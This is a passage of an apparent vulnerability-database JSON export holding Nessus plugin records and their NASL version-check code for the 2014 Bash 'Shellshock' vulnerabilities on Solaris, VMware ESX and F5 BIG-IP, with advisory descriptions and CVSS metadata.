CVE-2014-7169, and CVE-2014-6277.\n (CVE-2014-6278)\n\n - GNU Bash through 4.3 bash43-025 processes trailing strings after certain malformed function definitions in the values of environment variables, which allows remote attackers to write to files or possibly have other unknown impact via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the 'mod_cgi' and 'mod_cgid' modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. Note that this vulnerability exists because of an incomplete fix for CVE-2014-6271. (CVE-2014-7169)\n\n - The redirection implementation in 'parse.y' in GNU Bash through 4.3 bash43-026 allows remote attackers to cause a denial of service (out-of-bounds array access and application crash) or possibly have other unspecified impact via crafted use of 'here' documents, also known as the 'redir_stack' issue. (CVE-2014-7186)\n\n - An off-by-one error in the 'read_token_word' function in 'parse.y' in GNU Bash through 4.3 bash43-026 allows remote attackers to cause a denial of service (out-of-bounds array access and application crash) or possibly have other unspecified impact via deeply nested for-loops, also known as the 'word_lineno' issue.\n (CVE-2014-7187)", "cvss3": {"score": null, "vector": null}, "published": "2014-10-13T00:00:00", "type": "nessus", "title": "Oracle third party patch update : bash_2014_10_07", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/o:oracle:solaris"], "id": "SOLARIS11_BASH_2014_10_07.NASL", "href": "https://www.tenable.com/plugins/nessus/78395", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Oracle Third Party software advisories.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78395);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-6277\",\n \"CVE-2014-6278\",\n \"CVE-2014-7169\",\n \"CVE-2014-7186\",\n \"CVE-2014-7187\"\n );\n script_bugtraq_id(\n 70103,\n 70137,\n 70152,\n 70154,\n 70165,\n 70166\n );\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Oracle third party patch update : bash_2014_10_07\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Solaris system is missing a security patch for third party\nsoftware.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Solaris system is missing necessary patches to address\ncritical security updates related to 'Shellshock' :\n\n - GNU Bash through 4.3 processes trailing strings after\n function definitions in the values of environment\n variables, which allows remote attackers to execute\n arbitrary code via a crafted environment, as\n demonstrated by vectors involving the ForceCommand\n feature in OpenSSH sshd, the 'mod_cgi' and 'mod_cgid'\n modules in the Apache HTTP Server, scripts executed by\n unspecified DHCP clients, and other situations in which\n setting the environment occurs across a privilege\n boundary from Bash execution, also known as\n 'Shellshock.' Note that the original fix for this issue\n was incorrect; CVE-2014-7169 has been assigned to cover\n the vulnerability that is still present after the\n incorrect fix. (CVE-2014-6271)\n\n - GNU Bash through 4.3 bash43-026 does not properly parse\n function definitions in the values of environment\n variables, which allows remote attackers to execute\n arbitrary code or cause a denial of service\n (uninitialized memory access, and untrusted-pointer\n read and write operations) via a crafted environment,\n as demonstrated by vectors involving the ForceCommand\n feature in OpenSSH sshd, the 'mod_cgi' and 'mod_cgid'\n modules in the Apache HTTP Server, scripts executed by\n unspecified DHCP clients, and other situations in which\n setting the environment occurs across a privilege\n boundary from Bash execution. Note that this\n vulnerability exists because of an incomplete fix for\n CVE-2014-6271 and CVE-2014-7169. (CVE-2014-6277)\n\n - GNU Bash through 4.3 bash43-026 does not properly parse\n function definitions in the values of environment\n variables, which allows remote attackers to execute\n arbitrary commands via a crafted environment, as\n demonstrated by vectors involving the ForceCommand\n feature in OpenSSH sshd, the 'mod_cgi' and 'mod_cgid'\n modules in the Apache HTTP Server, scripts executed by\n unspecified DHCP clients, and other situations in which\n setting the environment occurs across a privilege\n boundary from Bash execution. Note that this\n vulnerability exists because of an incomplete fix for\n CVE-2014-6271, CVE-2014-7169, and CVE-2014-6277.\n (CVE-2014-6278)\n\n - GNU Bash through 4.3 bash43-025 processes trailing\n strings after certain malformed function definitions in\n the values of environment variables, which allows remote\n attackers to write to files or possibly have other\n unknown impact via a crafted environment, as\n demonstrated by vectors involving the ForceCommand\n feature in OpenSSH sshd, the 'mod_cgi' and 'mod_cgid'\n modules in the Apache HTTP Server, scripts executed by\n unspecified DHCP clients, and other situations in which\n setting the environment occurs across a privilege\n boundary from Bash execution. Note that this\n vulnerability exists because of an incomplete fix for\n CVE-2014-6271. (CVE-2014-7169)\n\n - The redirection implementation in 'parse.y' in GNU Bash\n through 4.3 bash43-026 allows remote attackers to cause\n a denial of service (out-of-bounds array access and\n application crash) or possibly have other unspecified\n impact via crafted use of 'here' documents, also known\n as the 'redir_stack' issue. (CVE-2014-7186)\n\n - An off-by-one error in the 'read_token_word' function in\n 'parse.y' in GNU Bash through 4.3 bash43-026 allows\n remote attackers to cause a denial of service\n (out-of-bounds array access and application crash) or\n possibly have other unspecified impact via deeply\n nested for-loops, also known as the 'word_lineno' issue.\n (CVE-2014-7187)\");\n # https://www.oracle.com/technetwork/topics/security/thirdparty-patch-map-1482893.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4a913f44\");\n script_set_attribute(attribute:\"see_also\", value:\"https://getupdates.oracle.com/readme/149080-02\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n # https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dacf7829\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/2014/09/cve-2014-6271/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://blogs.oracle.com/patch/entry/solaris_idrs_available_on_mos\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the Solaris system to version SRU 11.2.2.8.0.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Solaris Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris11/release\", \"Host/Solaris11/pkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Solaris11/release\");\nif (isnull(release)) audit(AUDIT_OS_NOT, \"Solaris11\");\npkg_list = solaris_pkg_list_leaves();\nif (isnull (pkg_list)) audit(AUDIT_PACKAGE_LIST_MISSING, \"Solaris pkg-list packages\");\n\nflag = 0;\n\nif (preg(string:pkg_list, pattern:\"(^|\\n)bash(\\n|$)\", multiline:TRUE))\n{\n if (solaris_check_release(release:\"0.5.11-0.175.2.2.0.8.0\", sru:\"SRU 11.2.2.8.0\") > 0) flag++;\n}\nelse audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n\nif (flag)\n{\n error_extra = 'Affected package : bash\\n' + solaris_get_report2();\n error_extra = ereg_replace(pattern:\"version\", replace:\"OS version\", string:error_extra);\n if (report_verbosity > 0) security_hole(port:0, extra:error_extra);\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_PACKAGE_NOT_AFFECTED, \"bash\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-04T23:57:45", "description": "a. Bash update for multiple products.\n\n Bash libraries have been updated in multiple products to resolve multiple critical security issues, also referred to as Shellshock.\n The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the identifiers CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, and CVE-2014-7187, CVE-2014-6277, CVE-2014-6278 to these issues.\n\n VMware products have been grouped into the following four product categories :\n I) ESXi and ESX Hypervisor ESXi is not affected because ESXi uses the Ash shell (through busybox), which is not affected by the vulnerability reported for the Bash shell.\n ESX has an affected version of the Bash shell. See table 1 for remediation for ESX.\n II) Windows-based products Windows-based products, including all versions of vCenter Server running on Windows, are not affected.\n\n III) VMware (virtual) appliances VMware (virtual) appliances ship with an affected version of Bash. See table 2 for remediation for appliances.\n IV) Products that run on Linux, Android, OSX or iOS (excluding virtual appliances)\n\n Products that run on Linux, Android, OSX or iOS (excluding virtual appliances) might use the Bash shell that is part of the operating system. If the operating system has a vulnerable version of Bash, the Bash security vulnerability might be exploited through the product. VMware recommends that customers contact their operating system vendor for a patch. MITIGATIONS\n\n VMware encourages restricting access to appliances through firewall rules and other network layer controls to only trusted IP addresses. This measure will greatly reduce any risk to these appliances.\n\n RECOMMENDATIONS\n\n VMware recommends customers evaluate and deploy patches for affected products in Table 1 and 2 below as these patches become available. \n\n For several products, both a patch and a product update are available.\n In general, if a patch is made available, the patch must be applied to the latest version of the appliance.\n\n Customers should refer to the specific product Knowledge Base articles listed in Section 4 to understand the type of remediation available and applicable appliance version numbers.\n\n Column 4 of the following tables lists the action required to remediate the vulnerability in each release, if a solution is available.\n\n Table 1 - ESXi and ESX Hypervisor =================================", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2014-10-02T00:00:00", "type": "nessus", "title": "VMSA-2014-0010 : VMware product updates address critical Bash security vulnerabilities (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/o:vmware:esx:4.0", "cpe:/o:vmware:esx:4.1"], "id": "VMWARE_VMSA-2014-0010.NASL", "href": "https://www.tenable.com/plugins/nessus/78025", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from VMware Security Advisory 2014-0010. \n# The text itself is copyright (C) VMware Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78025);\n script_version(\"1.37\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-6277\",\n \"CVE-2014-6278\",\n \"CVE-2014-7169\",\n \"CVE-2014-7186\",\n \"CVE-2014-7187\"\n );\n script_bugtraq_id(\n 70103,\n 70137,\n 70152,\n 70154,\n 70165,\n 70166\n );\n script_xref(name:\"VMSA\", value:\"2014-0010\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"VMSA-2014-0010 : VMware product updates address critical Bash security vulnerabilities (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote VMware ESX host is missing a security-related patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"a. Bash update for multiple products.\n\n Bash libraries have been updated in multiple products to resolve \n multiple critical security issues, also referred to as Shellshock.\n \n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n has assigned the identifiers CVE-2014-6271, CVE-2014-7169, \n CVE-2014-7186, and CVE-2014-7187, CVE-2014-6277, CVE-2014-6278 \n to these issues.\n\n VMware products have been grouped into the following four\n product categories :\n \n I) ESXi and ESX Hypervisor\n ESXi is not affected because ESXi uses the Ash shell (through\n busybox), which is not affected by the vulnerability reported\n for the Bash shell.\n ESX has an affected version of the Bash shell. See table 1 for\n remediation for ESX.\n \n II) Windows-based products\n Windows-based products, including all versions of vCenter Server \n running on Windows, are not affected.\n\n III) VMware (virtual) appliances\n VMware (virtual) appliances ship with an affected version of Bash. \n See table 2 for remediation for appliances.\n \n IV) Products that run on Linux, Android, OSX or iOS (excluding \n virtual appliances)\n\n Products that run on Linux, Android, OSX or iOS (excluding \n virtual appliances) might use the Bash shell that is part of the\n operating system. If the operating system has a vulnerable\n version of Bash, the Bash security vulnerability might be\n exploited through the product. VMware recommends that customers\n contact their operating system vendor for a patch. \n \n MITIGATIONS\n\n VMware encourages restricting access to appliances through\n firewall rules and other network layer controls to only trusted IP\n addresses. This measure will greatly reduce any risk to these\n appliances.\n\n RECOMMENDATIONS\n\n VMware recommends customers evaluate and deploy patches for\n affected products in Table 1 and 2 below as these\n patches become available. \n\n For several products, both a patch and a product update are\navailable.\n In general, if a patch is made available, the patch must be applied \n to the latest version of the appliance.\n\n Customers should refer to the specific product Knowledge Base\narticles \n listed in Section 4 to understand the type of remediation available\nand \n applicable appliance version numbers.\n\n Column 4 of the following tables lists the action required to\n remediate the vulnerability in each release, if a solution is\n available.\n\n Table 1 - ESXi and ESX Hypervisor\n =================================\");\n script_set_attribute(attribute:\"see_also\", value:\"http://lists.vmware.com/pipermail/security-announce/2014/000278.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the missing patch.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esx:4.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esx:4.1\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"VMware ESX Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/VMware/release\", \"Host/VMware/version\");\n script_require_ports(\"Host/VMware/esxupdate\", \"Host/VMware/esxcli_software_vibs\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"vmware_esx_packages.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/VMware/release\")) audit(AUDIT_OS_NOT, \"VMware ESX / ESXi\");\nif (\n !get_kb_item(\"Host/VMware/esxcli_software_vibs\") &&\n !get_kb_item(\"Host/VMware/esxupdate\")\n) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ninit_esx_check(date:\"2014-09-30\");\nflag = 0;\n\n\nif (esx_check(ver:\"ESX 4.0\", patch:\"ESX400-201410401-SG\")) flag++;\n\nif (esx_check(ver:\"ESX 4.1\", patch:\"ESX410-201410401-SG\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:esx_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-04T23:57:47", "description": "GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2014-10-10T00:00:00", "type": "nessus", "title": "F5 Networks BIG-IP : Multiple GNU Bash vulnerabilities (SOL15629) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/a:f5:big-ip_access_policy_manager", "cpe:/a:f5:big-ip_advanced_firewall_manager", "cpe:/a:f5:big-ip_application_acceleration_manager", "cpe:/a:f5:big-ip_application_security_manager", "cpe:/a:f5:big-ip_application_visibility_and_reporting", "cpe:/a:f5:big-ip_global_traffic_manager", "cpe:/a:f5:big-ip_link_controller", "cpe:/a:f5:big-ip_local_traffic_manager", "cpe:/a:f5:big-ip_policy_enforcement_manager", "cpe:/a:f5:big-ip_wan_optimization_manager", "cpe:/a:f5:big-ip_webaccelerator", "cpe:/h:f5:big-ip", "cpe:/h:f5:big-ip_protocol_security_manager"], "id": "F5_BIGIP_SOL15629.NASL", "href": "https://www.tenable.com/plugins/nessus/78197", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution SOL15629.\n#\n# The text description of this plugin is (C) F5 Networks.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78197);\n script_version(\"1.28\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-6277\",\n \"CVE-2014-6278\",\n \"CVE-2014-7169\",\n \"CVE-2014-7186\",\n \"CVE-2014-7187\"\n );\n script_bugtraq_id(\n 70103,\n 70137,\n 70152,\n 70154,\n 70165,\n 70166\n );\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"F5 Networks BIG-IP : Multiple GNU Bash vulnerabilities (SOL15629) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"GNU Bash through 4.3 processes trailing strings after function\ndefinitions in the values of environment variables, which allows\nremote attackers to execute arbitrary code via a crafted environment,\nas demonstrated by vectors involving the ForceCommand feature in\nOpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP\nServer, scripts executed by unspecified DHCP clients, and other\nsituations in which setting the environment occurs across a privilege\nboundary from Bash execution.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.f5.com/labs\");\n # https://devcentral.f5.com/articles/3-ways-to-use-big-ip-asm-to-mitigate-shellshock\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d8374474\");\n script_set_attribute(attribute:\"see_also\", value:\"https://devcentral.f5.com/articles/cve-2014-6271-shellshocked\");\n # https://devcentral.f5.com/articles/shellshock-mitigation-with-big-ip-irules\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?658e7e22\");\n # https://devcentral.f5.com/articles/shellshock-mitigation-with-linerate-proxy\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?48d59554\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.f5.com/csp/article/K15629\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5\nSolution SOL15629.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/10\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_advanced_firewall_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_acceleration_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_visibility_and_reporting\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_policy_enforcement_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_wan_optimization_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_webaccelerator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip_protocol_security_manager\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude(\"f5_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nversion = get_kb_item(\"Host/BIG-IP/version\");\nif ( ! version ) audit(AUDIT_OS_NOT, \"F5 Networks BIG-IP\");\nif ( isnull(get_kb_item(\"Host/BIG-IP/hotfix\")) ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/hotfix\");\nif ( ! get_kb_item(\"Host/BIG-IP/modules\") ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/modules\");\n\nsol = \"SOL15629\";\nvmatrix = make_array();\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n# AFM\nvmatrix[\"AFM\"] = make_array();\nvmatrix[\"AFM\"][\"affected\" ] = make_list(\"11.6.0\",\"11.3.0-11.5.1\");\nvmatrix[\"AFM\"][\"unaffected\"] = make_list(\"11.6.0HF1\",\"11.5.2-11.5.3\",\"11.5.1HF5\",\"11.5.0HF5\",\"11.4.1HF5\",\"11.4.0HF8\",\"11.3.0HF10\");\n\n# AM\nvmatrix[\"AM\"] = make_array();\nvmatrix[\"AM\"][\"affected\" ] = make_list(\"11.6.0\",\"11.4.0-11.5.1\");\nvmatrix[\"AM\"][\"unaffected\"] = make_list(\"11.6.0HF1\",\"11.5.2-11.5.3\",\"11.5.1HF5\",\"11.5.0HF5\",\"11.4.1HF5\",\"11.4.0HF8\");\n\n# APM\nvmatrix[\"APM\"] = make_array();\nvmatrix[\"APM\"][\"affected\" ] = make_list(\"11.6.0\",\"11.0.0-11.5.1\",\"10.1.0-10.2.4\");\nvmatrix[\"APM\"][\"unaffected\"] = make_list(\"11.6.0HF1\",\"11.5.2-11.5.3\",\"11.5.1HF5\",\"11.5.0HF5\",\"11.4.1HF5\",\"11.4.0HF8\",\"11.3.0HF10\",\"11.2.1HF12\",\"10.2.4HF9\");\n\n# ASM\nvmatrix[\"ASM\"] = make_array();\nvmatrix[\"ASM\"][\"affected\" ] = make_list(\"11.6.0\",\"11.0.0-11.5.1\",\"10.0.0-10.2.4\");\nvmatrix[\"ASM\"][\"unaffected\"] = make_list(\"11.6.0HF1\",\"11.5.2-11.5.3\",\"11.5.1HF5\",\"11.5.0HF5\",\"11.4.1HF5\",\"11.4.0HF8\",\"11.3.0HF10\",\"11.2.1HF12\",\"10.2.4HF9\");\n\n# AVR\nvmatrix[\"AVR\"] = make_array();\nvmatrix[\"AVR\"][\"affected\" ] = make_list(\"11.6.0\",\"11.0.0-11.5.1\");\nvmatrix[\"AVR\"][\"unaffected\"] = make_list(\"11.6.0HF1\",\"11.5.2-11.5.3\",\"11.5.1HF5\",\"11.5.0HF5\",\"11.4.1HF5\",\"11.4.0HF8\",\"11.3.0HF10\",\"11.2.1HF12\");\n\n# GTM\nvmatrix[\"GTM\"] = make_array();\nvmatrix[\"GTM\"][\"affected\" ] = make_list(\"11.6.0\",\"11.0.0-11.5.1\",\"10.0.0-10.2.4\");\nvmatrix[\"GTM\"][\"unaffected\"] = make_list(\"11.6.0HF1\",\"11.5.2-11.5.3\",\"11.5.1HF5\",\"11.5.0HF5\",\"11.4.1HF5\",\"11.4.0HF8\",\"11.3.0HF10\",\"11.2.1HF12\",\"10.2.4HF9\");\n\n# LC\nvmatrix[\"LC\"] = make_array();\nvmatrix[\"LC\"][\"affected\" ] = make_list(\"11.6.0\",\"11.0.0-11.5.1\",\"10.0.0-10.2.4\");\nvmatrix[\"LC\"][\"unaffected\"] = make_list(\"11.6.0HF1\",\"11.5.2-11.5.3\",\"11.5.1HF5\",\"11.5.0HF5\",\"11.4.1HF5\",\"11.4.0HF8\",\"11.3.0HF10\",\"11.2.1HF12\",\"10.2.4HF9\");\n\n# LTM\nvmatrix[\"LTM\"] = make_array();\nvmatrix[\"LTM\"][\"affected\" ] = make_list(\"11.6.0\",\"11.0.0-11.5.1\",\"10.0.0-10.2.4\");\nvmatrix[\"LTM\"][\"unaffected\"] = make_list(\"11.6.0HF1\",\"11.5.2-11.5.3\",\"11.5.1HF5\",\"11.5.0HF5\",\"11.4.1HF5\",\"11.4.0HF8\",\"11.3.0HF10\",\"11.2.1HF12\",\"10.2.4HF9\");\n\n# PEM\nvmatrix[\"PEM\"] = make_array();\nvmatrix[\"PEM\"][\"affected\" ] = make_list(\"11.6.0\",\"11.3.0-11.5.1\");\nvmatrix[\"PEM\"][\"unaffected\"] = make_list(\"11.6.0HF1\",\"11.5.2-11.5.3\",\"11.5.1HF5\",\"11.5.0HF5\",\"11.4.1HF5\",\"11.3.0HF10\");\n\n# PSM\nvmatrix[\"PSM\"] = make_array();\nvmatrix[\"PSM\"][\"affected\" ] = make_list(\"11.0.0-11.4.1\",\"10.0.0-10.2.4\");\nvmatrix[\"PSM\"][\"unaffected\"] = 